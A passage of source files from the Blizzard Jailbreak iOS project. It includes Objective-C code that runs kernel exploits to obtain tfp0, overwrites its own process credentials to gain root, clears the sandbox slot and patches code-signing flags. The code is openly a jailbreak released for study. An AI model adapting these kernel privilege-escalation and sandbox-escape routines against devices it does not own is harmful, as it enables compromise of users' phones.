          </constraints>\n                                <fontDescription key=\"fontDescription\" type=\"system\" weight=\"semibold\" pointSize=\"17\"/>\n                                <state key=\"normal\" title=\"Uninstall Blizzard\" backgroundImage=\"button_mask\">\n                                    <color key=\"titleColor\" red=\"0.66965128490215986\" green=\"0.59689297479878445\" blue=\"0.92434423575129532\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                                </state>\n                                <userDefinedRuntimeAttributes>\n                                    <userDefinedRuntimeAttribute type=\"number\" keyPath=\"layer.cornerRadius\">\n                                        <integer key=\"value\" value=\"20\"/>\n                                    </userDefinedRuntimeAttribute>\n                                    <userDefinedRuntimeAttribute type=\"boolean\" keyPath=\"clipsToBounds\" value=\"YES\"/>\n                                </userDefinedRuntimeAttributes>\n                            </button>\n                            <button opaque=\"NO\" alpha=\"0.84999999999999998\" contentMode=\"scaleToFill\" contentHorizontalAlignment=\"center\" contentVerticalAlignment=\"center\" lineBreakMode=\"middleTruncation\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"ynI-kc-Znh\">\n                                <rect key=\"frame\" x=\"16\" y=\"506\" width=\"286\" height=\"42\"/>\n                                <constraints>\n                                    <constraint firstAttribute=\"height\" constant=\"42\" id=\"ivX-Ua-KWg\"/>\n                                </constraints>\n                                <state key=\"normal\" title=\"SAVE SETTINGS\" backgroundImage=\"button_mask\">\n                                    <color key=\"titleColor\" red=\"0.059621539360000003\" green=\"0.12937427879999999\" blue=\"0.23696567360000001\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n 
                               </state>\n                                <userDefinedRuntimeAttributes>\n                                    <userDefinedRuntimeAttribute type=\"number\" keyPath=\"layer.cornerRadius\">\n                                        <integer key=\"value\" value=\"20\"/>\n                                    </userDefinedRuntimeAttribute>\n                                    <userDefinedRuntimeAttribute type=\"boolean\" keyPath=\"clipsToBounds\" value=\"YES\"/>\n                                </userDefinedRuntimeAttributes>\n                                <connections>\n                                    <action selector=\"saveJailbreakSettings:\" destination=\"ccD-bF-PLb\" eventType=\"touchUpInside\" id=\"pUi-Ou-cLm\"/>\n                                </connections>\n                            </button>\n                            <label opaque=\"NO\" userInteractionEnabled=\"NO\" contentMode=\"left\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" text=\"Set Nonce\" lineBreakMode=\"tailTruncation\" baselineAdjustment=\"alignBaselines\" minimumFontSize=\"9\" adjustsFontForContentSizeCategory=\"YES\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"sFS-xy-61l\">\n                                <rect key=\"frame\" x=\"16\" y=\"232\" width=\"101\" height=\"23\"/>\n                                <fontDescription key=\"fontDescription\" type=\"system\" pointSize=\"19\"/>\n                                <color key=\"textColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                                <nil key=\"highlightedColor\"/>\n                            </label>\n                            <textField opaque=\"NO\" contentMode=\"scaleToFill\" contentHorizontalAlignment=\"left\" contentVerticalAlignment=\"center\" text=\"0x1111111111111111\" borderStyle=\"roundedRect\" placeholder=\"0x1111111111111111\" clearsOnBeginEditing=\"YES\" 
adjustsFontForContentSizeCategory=\"YES\" minimumFontSize=\"17\" clearButtonMode=\"whileEditing\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"OjN-ig-hZR\">\n                                <rect key=\"frame\" x=\"133\" y=\"228\" width=\"169\" height=\"30\"/>\n                                <color key=\"backgroundColor\" red=\"0.079355003360750492\" green=\"0.17626018463250789\" blue=\"0.31915884067357514\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                                <color key=\"tintColor\" red=\"0.72446093020000002\" green=\"0.64574749499999995\" blue=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                                <constraints>\n                                    <constraint firstAttribute=\"width\" secondItem=\"OjN-ig-hZR\" secondAttribute=\"height\" multiplier=\"169:30\" id=\"0NE-MG-rri\"/>\n                                    <constraint firstAttribute=\"height\" constant=\"30\" id=\"U5F-Qb-Cgv\"/>\n                                    <constraint firstAttribute=\"width\" constant=\"169\" id=\"Xw3-QH-HKY\"/>\n                                </constraints>\n                                <color key=\"textColor\" red=\"0.72446093020000002\" green=\"0.64574749499999995\" blue=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                                <fontDescription key=\"fontDescription\" type=\"system\" pointSize=\"19\"/>\n                                <textInputTraits key=\"textInputTraits\" autocorrectionType=\"no\" spellCheckingType=\"no\" keyboardAppearance=\"alert\" returnKeyType=\"continue\" smartDashesType=\"no\" smartInsertDeleteType=\"no\" smartQuotesType=\"no\" textContentType=\"name\"/>\n                            </textField>\n                        </subviews>\n                        <color key=\"backgroundColor\" red=\"0.059621539360000003\" green=\"0.12937427879999999\" blue=\"0.23696567360000001\" alpha=\"1\" colorSpace=\"custom\" 
customColorSpace=\"sRGB\"/>\n                        <constraints>\n                            <constraint firstItem=\"nFT-lw-eC5\" firstAttribute=\"trailing\" secondItem=\"X8I-y7-WsC\" secondAttribute=\"trailing\" constant=\"18\" id=\"3b3-3L-gMM\"/>\n                            <constraint firstItem=\"ynI-kc-Znh\" firstAttribute=\"top\" secondItem=\"mh9-gl-or8\" secondAttribute=\"bottom\" constant=\"152\" id=\"8qF-Xl-0lj\"/>\n                            <constraint firstItem=\"Lo2-8G-vdS\" firstAttribute=\"top\" secondItem=\"BNm-0w-E3T\" secondAttribute=\"bottom\" constant=\"14\" id=\"8xL-VB-xgI\"/>\n                            <constraint firstItem=\"sFS-xy-61l\" firstAttribute=\"top\" secondItem=\"yAE-R0-Bul\" secondAttribute=\"bottom\" constant=\"16\" id=\"9mb-zn-H5i\"/>\n                            <constraint firstItem=\"oAF-uh-bO8\" firstAttribute=\"top\" secondItem=\"X8I-y7-WsC\" secondAttribute=\"bottom\" constant=\"8\" id=\"AiU-6Y-ndB\"/>\n                            <constraint firstItem=\"F44-ZB-bbA\" firstAttribute=\"leading\" secondItem=\"nFT-lw-eC5\" secondAttribute=\"leading\" constant=\"16\" id=\"BlI-uK-tQW\"/>\n                            <constraint firstItem=\"nFT-lw-eC5\" firstAttribute=\"trailing\" secondItem=\"mh9-gl-or8\" secondAttribute=\"trailing\" constant=\"70\" id=\"F5Q-vD-G6G\"/>\n                            <constraint firstItem=\"mh9-gl-or8\" firstAttribute=\"leading\" secondItem=\"nFT-lw-eC5\" secondAttribute=\"leading\" constant=\"69\" id=\"HQ9-ub-NTG\"/>\n                            <constraint firstItem=\"BNm-0w-E3T\" firstAttribute=\"top\" secondItem=\"nFT-lw-eC5\" secondAttribute=\"top\" constant=\"7\" id=\"HYO-e7-J4F\"/>\n                            <constraint firstItem=\"X8I-y7-WsC\" firstAttribute=\"top\" secondItem=\"c6c-Vb-Re1\" secondAttribute=\"bottom\" constant=\"8\" id=\"M7T-X5-e9J\"/>\n                            <constraint firstItem=\"nFT-lw-eC5\" firstAttribute=\"trailing\" secondItem=\"Lo2-8G-vdS\" 
secondAttribute=\"trailing\" constant=\"18\" id=\"MmP-dg-hOy\"/>\n                            <constraint firstItem=\"yAE-R0-Bul\" firstAttribute=\"top\" secondItem=\"YV7-ks-D53\" secondAttribute=\"bottom\" constant=\"16\" id=\"Pak-Wy-onw\"/>\n                            <constraint firstItem=\"c6c-Vb-Re1\" firstAttribute=\"top\" secondItem=\"Lo2-8G-vdS\" secondAttribute=\"bottom\" constant=\"8\" id=\"R7Q-9U-1yE\"/>\n                            <constraint firstItem=\"pjT-vc-P8o\" firstAttribute=\"centerY\" secondItem=\"e5t-i2-8ZF\" secondAttribute=\"centerY\" id=\"RI6-NN-Fuy\"/>\n                            <constraint firstItem=\"F44-ZB-bbA\" firstAttribute=\"top\" secondItem=\"LlD-Gd-k5x\" secondAttribute=\"bottom\" constant=\"16\" id=\"V4Q-g2-DPJ\"/>\n                            <constraint firstItem=\"YV7-ks-D53\" firstAttribute=\"leading\" secondItem=\"nFT-lw-eC5\" secondAttribute=\"leading\" constant=\"16\" id=\"WU9-Ef-nNM\"/>\n                            <constraint firstItem=\"nFT-lw-eC5\" firstAttribute=\"trailing\" secondItem=\"c6c-Vb-Re1\" secondAttribute=\"trailing\" constant=\"18\" id=\"Xvz-po-bDZ\"/>\n                            <constraint firstItem=\"nFT-lw-eC5\" firstAttribute=\"trailing\" secondItem=\"BNm-0w-E3T\" secondAttribute=\"trailing\" constant=\"38\" id=\"ZTm-lu-vPV\"/>\n                            <constraint firstItem=\"LlD-Gd-k5x\" firstAttribute=\"top\" secondItem=\"BNm-0w-E3T\" secondAttribute=\"bottom\" constant=\"19\" id=\"bKt-TL-c21\"/>\n                            <constraint firstItem=\"BNm-0w-E3T\" firstAttribute=\"leading\" secondItem=\"nFT-lw-eC5\" secondAttribute=\"leading\" constant=\"38\" id=\"ccu-3H-g5F\"/>\n                            <constraint firstItem=\"nFT-lw-eC5\" firstAttribute=\"bottom\" secondItem=\"ynI-kc-Znh\" secondAttribute=\"bottom\" constant=\"20\" id=\"ce6-iL-T9Y\"/>\n                            <constraint firstItem=\"LlD-Gd-k5x\" firstAttribute=\"leading\" secondItem=\"nFT-lw-eC5\" 
secondAttribute=\"leading\" constant=\"16\" id=\"dAW-mp-db8\"/>\n                            <constraint firstItem=\"nFT-lw-eC5\" firstAttribute=\"trailing\" secondItem=\"ynI-kc-Znh\" secondAttribute=\"trailing\" constant=\"18\" id=\"hWi-aQ-jY0\"/>\n                            <constraint firstItem=\"nFT-lw-eC5\" firstAttribute=\"trailing\" secondItem=\"oAF-uh-bO8\" secondAttribute=\"trailing\" constant=\"18\" id=\"i23-en-Q48\"/>\n                            <constraint firstItem=\"ynI-kc-Znh\" firstAttribute=\"leading\" secondItem=\"nFT-lw-eC5\" secondAttribute=\"leading\" constant=\"16\" id=\"kNS-Na-G9j\"/>\n                            <constraint firstItem=\"YV7-ks-D53\" firstAttribute=\"top\" secondItem=\"F44-ZB-bbA\" secondAttribute=\"bottom\" constant=\"16\" id=\"kiI-Iu-4Wc\"/>\n                            <constraint firstItem=\"nFT-lw-eC5\" firstAttribute=\"trailing\" secondItem=\"OjN-ig-hZR\" secondAttribute=\"trailing\" constant=\"18\" id=\"kqV-G0-UgE\"/>\n                            <constraint firstItem=\"pjT-vc-P8o\" firstAttribute=\"centerX\" secondItem=\"e5t-i2-8ZF\" secondAttribute=\"centerX\" id=\"oSw-oR-gxE\"/>\n                            <constraint firstItem=\"OjN-ig-hZR\" firstAttribute=\"leading\" secondItem=\"sFS-xy-61l\" secondAttribute=\"trailing\" constant=\"16\" id=\"sgx-bn-FSg\"/>\n                            <constraint firstItem=\"OjN-ig-hZR\" firstAttribute=\"top\" secondItem=\"oAF-uh-bO8\" secondAttribute=\"bottom\" constant=\"9\" id=\"uJ3-Jc-0s7\"/>\n                            <constraint firstItem=\"yAE-R0-Bul\" firstAttribute=\"leading\" secondItem=\"nFT-lw-eC5\" secondAttribute=\"leading\" constant=\"16\" id=\"wZz-NQ-Cuj\"/>\n                            <constraint firstItem=\"sFS-xy-61l\" firstAttribute=\"leading\" secondItem=\"nFT-lw-eC5\" secondAttribute=\"leading\" constant=\"16\" id=\"zKT-na-bU3\"/>\n                        </constraints>\n                        <viewLayoutGuide key=\"safeArea\" id=\"nFT-lw-eC5\"/>\n      
              </view>\n                    <connections>\n                        <outlet property=\"nonceField\" destination=\"OjN-ig-hZR\" id=\"Y5S-dg-ivX\"/>\n                    </connections>\n                </viewController>\n                <placeholder placeholderIdentifier=\"IBFirstResponder\" id=\"5aV-ZD-Tsj\" userLabel=\"First Responder\" sceneMemberID=\"firstResponder\"/>\n            </objects>\n            <point key=\"canvasLocation\" x=\"1493.5999999999999\" y=\"-249.62518740629687\"/>\n        </scene>\n    </scenes>\n    <resources>\n        <image name=\"button_mask\" width=\"100\" height=\"100\"/>\n        <image name=\"jailbreak_wallpaper\" width=\"834\" height=\"1194\"/>\n        <image name=\"winter\" width=\"256\" height=\"256\"/>\n    </resources>\n</document>\n"
  },
  {
    "path": "Blizzard Jailbreak/BlizzardLog.h",
    "content": "//\n//  BlizzardLog.h\n//  Blizzard Jailbreak\n//\n//  Created by GeoSn0w on 8/10/20.\n//  Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#import <UIKit/UIKit.h>\n\nNS_ASSUME_NONNULL_BEGIN\n\n@interface BlizzardLog : UIViewController\n@property (weak, nonatomic) IBOutlet UIButton *dismissLog;\n@property (weak, nonatomic) IBOutlet UITextView *uiLogView;\n+ (instancetype)BlizzLogger;\n- (void)displaySnapshotNotice;\n- (void)customizeBtnAtUI;\n@end\n\nNS_ASSUME_NONNULL_END\n"
  },
  {
    "path": "Blizzard Jailbreak/BlizzardLog.m",
    "content": "//\n//  BlizzardLog.m\n//  Blizzard Jailbreak\n//\n//  Created by GeoSn0w on 8/10/20.\n//  Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#import \"BlizzardLog.h\"\n#import \"../Kernel Utilities/system_reboot.h\"\n#import \"../Exploits/sock_port/exploit.h\"\n#import \"../Blizzard Jailbreak/blizzardJailbreak.h\"\n#import \"../APFS Utilities/rootfs_remount.h\"\n#import \"../Exploits/FreeTheSandbox/freethesandbox.h\"\n#define currentVer(v)  ([[[UIDevice currentDevice] systemVersion] compare:@v options:NSNumericSearch] != NSOrderedDescending)\n@interface BlizzardLog()\n@end\n\nstatic BlizzardLog *BlizzLogger;\n\n@implementation BlizzardLog\n\n+ (instancetype)BlizzLogger {\n    return BlizzLogger;\n}\n\nint dismissButtonActionType = 0;\nint IS_BLIZZARD_DEBUG = 0;\nint shouldUnjailbreak = 0;\n\n- (void)viewDidLoad {\n    [super viewDidLoad];\n    if (IS_BLIZZARD_DEBUG != 1){\n        [self redirectSTD:STDOUT_FILENO];\n    }\n    NSRange lastLine = NSMakeRange(self.uiLogView.text.length - 1, 1);\n    [self.uiLogView scrollRangeToVisible:lastLine];\n    \n    dispatch_async(dispatch_get_global_queue(0, 0), ^{\n        [self runJailbreak];\n        dispatch_async(dispatch_get_main_queue(), ^{\n            //update UI in main thread.\n        });\n    });\n    \n}\n-(void) runJailbreak {\n    if (currentVer(\"11.4\")){\n        if (ios11_exploit_init() == 0){\n            if (shouldUnjailbreak == 1){\n                if (unjailbreakBlizzard() == 0){\n                    dismissButtonActionType = 1;\n                    printf(\"Unjailbroken!\\n\");\n                    [self.dismissLog setTitle:@\"REBOOT DEVICE\" forState:UIControlStateNormal];\n                }\n                return;\n            }\n            if (remountFileSystem() == 0 && shouldReboot == 1 && shouldUnjailbreak != 1){\n                dismissButtonActionType = 1;\n                [self.dismissLog setTitle:@\"REBOOT DEVICE\" forState:UIControlStateNormal];\n            } else {\n 
               printf(\"Used the old remount, tee hee\\n\");\n                installBootStrap();\n                cleanupAfterBlizzard();\n            }\n        }\n    } else if (currentVer(\"13.7\")){\n        extern char *get_current_deviceModel(void);\n        printf(\"Model: %s\\n\", get_current_deviceModel());\n        printf(\"Version: %s\\n\", [[[UIDevice currentDevice] systemVersion] UTF8String]);\n        \n        extern uint64_t kaslr;\n        extern mach_port_t tfp0_port;\n    \n        // Activate tfp0-persis program\n        mach_port_t midi_bsport = 0;\n        extern kern_return_t bootstrap_look_up(mach_port_t bp, const char *service_name, mach_port_t *sp);\n        bootstrap_look_up(bootstrap_port, \"com.apple.midiserver\", &midi_bsport);\n        if(!midi_bsport){\n            //printf(\"run_exploit_or_achieve_tf0 failed: bootstrap_look_up has problem\\n\");\n            exit(1);\n        }\n        \n        mach_port_t stored_ports[3] = {0};\n        stored_ports[0] = mach_task_self();\n        stored_ports[2] = midi_bsport;\n        mach_ports_register(mach_task_self(), stored_ports, 3);\n        // Waiting for installation\n        sleep(2);\n        \n        tfp0_port = 0;\n        task_get_special_port(mach_task_self(), TASK_ACCESS_PORT, &tfp0_port);\n        if(tfp0_port == 0){\n            printf(\"require to run exploit first\\n\");\n            \n            extern bool check_device_compatibility(void);\n            if(check_device_compatibility() == false){\n                printf(\"Execution pause: Not found offsets set for current device(model: %s)\\n\", get_current_deviceModel());\n                return;\n            }\n            \n            extern void exploit_start(void);\n            iOS13_exploit_init();\n            \n            printf(\"persis tfp0 installed, you can quit app now...\\n\");\n            return;\n        }\n        stored_ports[2] = 0;\n        mach_ports_register(mach_task_self(), stored_ports, 3);\n   
     \n        printf(\"tfp0: 0x%x\\n\", tfp0_port);\n        pid_for_task(tfp0_port, (int*)&kaslr);\n        printf(\"kaslr: 0x%x\\n\", (uint32_t)kaslr);\n        \n    }\n}\n- (IBAction)dismissLogWindow:(id)sender {\n    if (dismissButtonActionType == 0){\n        [self dismissViewControllerAnimated:YES completion:nil];\n    } else if (dismissButtonActionType == 1){\n        [self loadSystemNotif];\n    }\n}\n\n-(void)textViewDidChange:(UITextView *)textView\n{\n    NSRange lastLine = NSMakeRange(self.uiLogView.text.length - 1, 1);\n    [self.uiLogView scrollRangeToVisible:lastLine];\n}\n\n- (void)redirectNotificationHandle:(NSNotification *)nf{\n    NSData *data = [[nf userInfo] objectForKey:NSFileHandleNotificationDataItem];\n    NSString *str = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding];\n    \n    self.uiLogView.text = [NSString stringWithFormat:@\"%@\\n%@\",self.uiLogView.text, str];\n    NSRange lastLine = NSMakeRange(self.uiLogView.text.length - 1, 1);\n    [self.uiLogView scrollRangeToVisible:lastLine];\n    [[nf object] readInBackgroundAndNotify];\n}\n\n- (void)redirectSTD:(int )fd{\n    setvbuf(stdout, nil, _IONBF, 0);\n    NSPipe * pipe = [NSPipe pipe] ;\n    NSFileHandle *pipeReadHandle = [pipe fileHandleForReading] ;\n    dup2([[pipe fileHandleForWriting] fileDescriptor], fd) ;\n    \n    [[NSNotificationCenter defaultCenter] addObserver:self\n                                             selector:@selector(redirectNotificationHandle:)\n                                                 name:NSFileHandleReadCompletionNotification\n                                               object:pipeReadHandle] ;\n    [pipeReadHandle readInBackgroundAndNotify];\n}\n\n- (void)loadSystemNotif {\n    dispatch_async(dispatch_get_main_queue(), ^{\n        UIAlertController *apfsNoticeController = [UIAlertController alertControllerWithTitle:(@\"Blizzard Jailbreak\") message:(@\"The APFS Snapshot has been successfully renamed! 
Your device will reboot now. If you wanna jailbreak, please come back to the app and re-jailbreak upon reboot.\") preferredStyle:UIAlertControllerStyleAlert];\n        [apfsNoticeController addAction:[UIAlertAction actionWithTitle:(@\"Dismiss\") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {\n            reboot(RB_NOSYNC);\n        }]];\n        [self presentViewController:apfsNoticeController animated:YES completion:nil];\n    });\n}\n\n@end\n"
  },
  {
    "path": "Blizzard Jailbreak/BlizzardSpawnerTools.c",
    "content": "//\n//  BlizzardSpawnerTools.c\n//  Blizzard Jailbreak\n//\n//  Created by GeoSn0w on 8/11/20.\n//  Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#include \"BlizzardSpawnerTools.h\"\n#import <string.h>\n#import <stdlib.h>\n#import <stdio.h>\n#import <unistd.h>\n#import <spawn.h>\n#import <sys/mman.h>\n#import <sys/attr.h>\n#import <mach/mach.h>\n#import <sys/types.h>\n#import <CommonCrypto/CommonDigest.h>\n\nint launchProcessFrozen(char *whom, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env) {\n    const char* args[] = {whom, arg1, arg2, arg3, arg4, arg5, arg6, NULL};\n    pid_t process_pid;\n    posix_spawnattr_t attr;\n    posix_spawnattr_init(&attr);\n    posix_spawnattr_setflags(&attr, POSIX_SPAWN_START_SUSPENDED);\n    int returnValue = posix_spawn(&process_pid, whom, NULL, &attr, (char **)&args, env);\n    \n    if (returnValue) {\n        return returnValue;\n    } else {\n        return process_pid;\n    }\n}\n"
  },
  {
    "path": "Blizzard Jailbreak/BlizzardSpawnerTools.h",
    "content": "//\n//  BlizzardSpawnerTools.h\n//  Blizzard Jailbreak\n//\n//  Created by GeoSn0w on 8/11/20.\n//  Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#ifndef BlizzardSpawnerTools_h\n#define BlizzardSpawnerTools_h\n\n#include <stdio.h>\nint launchProcessFrozen(char *whom, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env);\n\n#endif /* BlizzardSpawnerTools_h */\n"
  },
  {
    "path": "Blizzard Jailbreak/Info.plist",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n\t<key>CFBundleDevelopmentRegion</key>\n\t<string>$(DEVELOPMENT_LANGUAGE)</string>\n\t<key>CFBundleDisplayName</key>\n\t<string>BLIZZARD</string>\n\t<key>CFBundleExecutable</key>\n\t<string>$(EXECUTABLE_NAME)</string>\n\t<key>CFBundleIdentifier</key>\n\t<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>\n\t<key>CFBundleInfoDictionaryVersion</key>\n\t<string>6.0</string>\n\t<key>CFBundleName</key>\n\t<string>$(PRODUCT_NAME)</string>\n\t<key>CFBundlePackageType</key>\n\t<string>APPL</string>\n\t<key>CFBundleShortVersionString</key>\n\t<string>1.0</string>\n\t<key>CFBundleVersion</key>\n\t<string>1</string>\n\t<key>LSRequiresIPhoneOS</key>\n\t<true/>\n\t<key>UILaunchStoryboardName</key>\n\t<string>LaunchScreen</string>\n\t<key>UIMainStoryboardFile</key>\n\t<string>Main</string>\n\t<key>UIRequiredDeviceCapabilities</key>\n\t<array>\n\t\t<string>armv7</string>\n\t</array>\n\t<key>UIRequiresFullScreen</key>\n\t<true/>\n\t<key>UIStatusBarStyle</key>\n\t<string>UIStatusBarStyleLightContent</string>\n\t<key>UISupportedInterfaceOrientations</key>\n\t<array>\n\t\t<string>UIInterfaceOrientationPortrait</string>\n\t</array>\n\t<key>UISupportedInterfaceOrientations~ipad</key>\n\t<array>\n\t\t<string>UIInterfaceOrientationPortrait</string>\n\t\t<string>UIInterfaceOrientationPortraitUpsideDown</string>\n\t\t<string>UIInterfaceOrientationLandscapeLeft</string>\n\t\t<string>UIInterfaceOrientationLandscapeRight</string>\n\t</array>\n\t<key>UIViewControllerBasedStatusBarAppearance</key>\n\t<false/>\n</dict>\n</plist>\n"
  },
  {
    "path": "Blizzard Jailbreak/blizzardJailbreak.h",
    "content": "//\n//  blizzardJailbreak.h\n//\n//  Created by GeoSn0w on 8/10/20.\n//  Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#ifndef blizzardJailbreak_h\n#define blizzardJailbreak_h\n\n#include <stdio.h>\nextern mach_port_t tfp0;\nvoid remountFirstStepSys(void);\nint ios11_exploit_init(void);\nint rootifyOurselves(void);\nint rootifyProcessByPid(void);\nint restoreProcessCredentials(uint64_t creds, pid_t pid);\nint obtainAPFSSnapshotsList(void);\nint remountFileSystem(void);\nint setcsflags(pid_t pid);\nint prepareKernelForPatchFinder(void);\nint cleanupAfterBlizzard(void);\nint installBootStrap(void);\nuint64_t findOurOwnProcess(void);\nuint64_t escapeSandboxForProcess(pid_t proc_pid);\nuint64_t copyPIDCredentials(pid_t processToBeGivenCreds, pid_t donorProcess);\n#endif /* blizzardJailbreak_h */\n"
  },
  {
    "path": "Blizzard Jailbreak/blizzardJailbreak.m",
    "content": "//\n//  blizzardJailbreak.c\n//\n//  Created by GeoSn0w on 8/10/20.\n//  Copyright © 2020 GeoSn0w. All rights reserved.\n//\n#import <Foundation/Foundation.h>\n#include \"blizzardJailbreak.h\"\n#include \"../Exploits/sock_port/exploit.h\"\n#include <stdio.h>\n#include <unistd.h>\n#include <errno.h>\n#include <netinet/in.h>\n#include <mach/mach.h>\n#include <sys/mman.h>\n#include <spawn.h>\n#include \"../Exploits/sock_port/kernel_memory.h\"\n#include \"../Exploits/sock_port/offsetof.h\"\n#include \"../Exploits/sock_port/offsets.h\"\n#include \"../PatchFinder/patchfinder64.h\"\n#include \"../Kernel Utilities/kernel_utils.h\"\n#include \"../Kernel Utilities/kexecute.h\"\n#include \"BlizzardLog.h\"\n#include \"../APFS Utilities/rootfs_remount.h\"\n#include \"../APFS Utilities/snapshot_tools.h\"\n#include \"../Kernel Utilities/kernSymbolication.h\"\n#include \"../AMFI Utilities/amfi_utils.h\"\n\n#define BlizzardJailbreakPath(obj) strdup([[[[NSBundle mainBundle] bundlePath] stringByAppendingPathComponent:@obj] UTF8String])\nint APFS_SNAPSHOT_EXISTS = 1;\n\nmach_port_t tfp0 = 0;\nuint64_t KernelBase;\nuint64_t defaultCredentials;\nuint64_t ourProc;\n\nvoid platformize(pid_t pid) {\n    if (!pid) return;\n    \n    uint64_t proc = proc_of_pid(pid);\n    uint64_t task = rk64(proc + off_task);\n    uint32_t t_flags = rk32(task + off_t_flags);\n    t_flags |= 0x400; // add TF_PLATFORM flag, = 0x400\n    wk32(task+off_t_flags, t_flags);\n    uint32_t csflags = rk32(proc + off_p_csflags);\n    wk32(proc + off_p_csflags, csflags | 0x24004001u); //patch csflags\n}\n\n\nint ios11_exploit_init(){\n    printf(\"Blizzard Jailbreak\\nby GeoSn0w (@FCE365)\\n\\nAn Open-Source Jailbreak for you to study and dissect :-)\\n\\n\");\n    tfp0 = get_tfp0();\n    if (MACH_PORT_VALID(tfp0)){\n        printf(\"Successfully got tfp0!\\n\");\n        init_kernel_utils(tfp0);\n        KernelBase = grabKernelBase();\n        if (!KernelBase) {\n            printf(\"ERROR: Failed to 
find kernel base\\n\");\n            return 2;\n        }\n        kernel_slide = (uint32_t)(KernelBase - 0xFFFFFFF007004000);\n\n        int ret = prepareKernelForPatchFinder(); // patchfinder\n        if (ret != 0) {\n            printf(\"Failed to initialize patchfinder\\n\");\n            return 3;\n        }\n    \n        printf(\"Initialized patchfinder\\n\");\n        ourProc = findOurOwnProcess();\n        rootifyOurselves();\n        defaultCredentials = escapeSandboxForProcess(getpid());\n        initializeKernelExecute();\n        uint64_t kern_proc = proc_of_pid(0);\n        printf(\"Kernel Proc is: 0x%llx\\n\", kern_proc);\n        setcsflags(getpid()); // set some csflags\n        platformize(getpid()); // set TF_PLATFORM\n        return 0;\n    } else {\n        printf(\"ERROR: Could not get tfp0!\\n\");\n        return -1;\n    }\n   \n}\n\nint cleanupAfterBlizzard(){\n    restoreProcessCredentials(defaultCredentials, getpid()); // Give back our process' credentials, otherwise the device will act weird.\n    terminateKernelExecute(); // Always clean up after your jailbreak components. 
Helps stability a lot.\n    terminatePatchFinder();\n    return 0;\n}\n\nint rootifyOurselves(){\n    printf(\"Preparing to elevate own privileges to ROOT!\\n\");\n    printf(\"    Current UID: %d\\n\", getuid());\n    printf(\"    Current EUID: %d\\n\", geteuid());\n    uint64_t proc = proc_of_pid(getpid()); // Get our PID's PROC structure.\n    uint64_t ucred = rk64(proc + off_p_ucred); //Get our credentials.\n    wk32(proc + off_p_uid, 0);\n    wk32(proc + off_p_ruid, 0);\n    wk32(proc + off_p_gid, 0);\n    wk32(proc + off_p_rgid, 0);\n    wk32(ucred + off_ucred_cr_uid, 0);\n    wk32(ucred + off_ucred_cr_ruid, 0);\n    wk32(ucred + off_ucred_cr_svuid, 0);\n    wk32(ucred + off_ucred_cr_ngroups, 1);\n    wk32(ucred + off_ucred_cr_groups, 0);\n    wk32(ucred + off_ucred_cr_rgid, 0);\n    wk32(ucred + off_ucred_cr_svgid, 0);\n    \n    printf(\"    New UID: %d\\n\", getuid());\n    printf(\"    New EUID: %d\\n\", geteuid());\n    \n    if (getuid() != 501 && geteuid() != 501){\n        printf(\"Successfully got ROOT!\\n\");\n    } else {\n        printf(\"ERROR: Failed to get ROOT!\\n\");\n        return -1;\n    }\n    return 0;\n}\nint restoreProcessCredentials(uint64_t creds, pid_t pid){\n    uint64_t proc = proc_of_pid(pid);\n    uint64_t ucred = rk64(proc + off_p_ucred);\n    uint64_t cr_label = rk64(ucred + off_ucred_cr_label);\n    wk64(cr_label + off_sandbox_slot, creds);\n    \n    if (rk64(rk64(ucred + off_ucred_cr_label) + off_sandbox_slot) != 0){\n        printf(\"Successfully restored the Sandbox!\\n\");\n        return 0;\n    } else {\n        printf(\"ERROR: Failed to restore the Sandbox!\\n\");\n        return -1;\n    }\n}\nuint64_t escapeSandboxForProcess(pid_t proc_pid) {\n    printf(\"Preparing to escape the sandbox...\\n\");\n    uint64_t target_process;\n    uint64_t ucred;\n    uint64_t sb_cr_label;\n    uint64_t default_creds;\n    \n    if (proc_pid == 0) {\n        printf(\"ERROR: Will NOT mess with Kernel's PID...\\n\");\n        return 
 -2;\n    }\n    \n    target_process = proc_of_pid(proc_pid);\n    ucred = rk64(target_process + off_p_ucred);\n    sb_cr_label = rk64(ucred + off_ucred_cr_label);\n    default_creds = rk64(sb_cr_label + off_sandbox_slot);\n    wk64(sb_cr_label + off_sandbox_slot, 0);\n    \n    /*\n     As far as I am aware, the first slot is used by AMFI. Sandbox should be the second.\n     Read Jonathan Levin's book on the Sandbox chapter for more details about the credentials.\n     */\n    \n    if (rk64(rk64(ucred + off_ucred_cr_label) + off_sandbox_slot) == 0){\n        printf(\"Successfully escaped the Sandbox!\\n\");\n        return default_creds;\n    } else {\n        printf(\"ERROR: Failed to escape the Sandbox!\\n\");\n        return -1;\n    }\n}\n\nint rootifyProcessByPid(){\n    return 0;\n}\n\nuint64_t findOurOwnProcess(){\n    static uint64_t self = 0;\n    if (!self) {\n        self = rk64(current_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));\n        printf(\"Found Ourselves at 0x%llx\\n\", self);\n    } else {\n        printf(\"ERROR: Cannot find our own process!\\n\");\n    }\n    return self;\n}\n\nuint64_t 